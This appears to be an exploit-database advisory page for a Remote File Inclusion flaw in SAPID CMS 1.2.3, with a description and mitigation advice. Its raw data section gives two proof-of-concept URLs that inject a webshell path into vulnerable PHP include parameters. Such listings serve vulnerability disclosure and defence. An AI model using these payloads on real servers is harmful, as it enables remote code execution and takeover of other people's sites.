header-logo
Suggest Exploit
vendor:
SAPID Stable
by:
Opa Yong
8,8
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: SAPID Stable
Affected Version From: 1.2.3
Affected Version To: 1.2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:sapid:sapid:1.2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Home Edition SP2
2011

SAPID Stable (RFI)

A Remote File Inclusion (RFI) vulnerability exists in SAPID Stable version 1.2.3. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated before being used in any file operations. Additionally, ensure that the web server is configured to only serve files from a trusted directory.
Source

Exploit-DB raw data:

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula

Navigation

Suggest Exploit

Services By CQR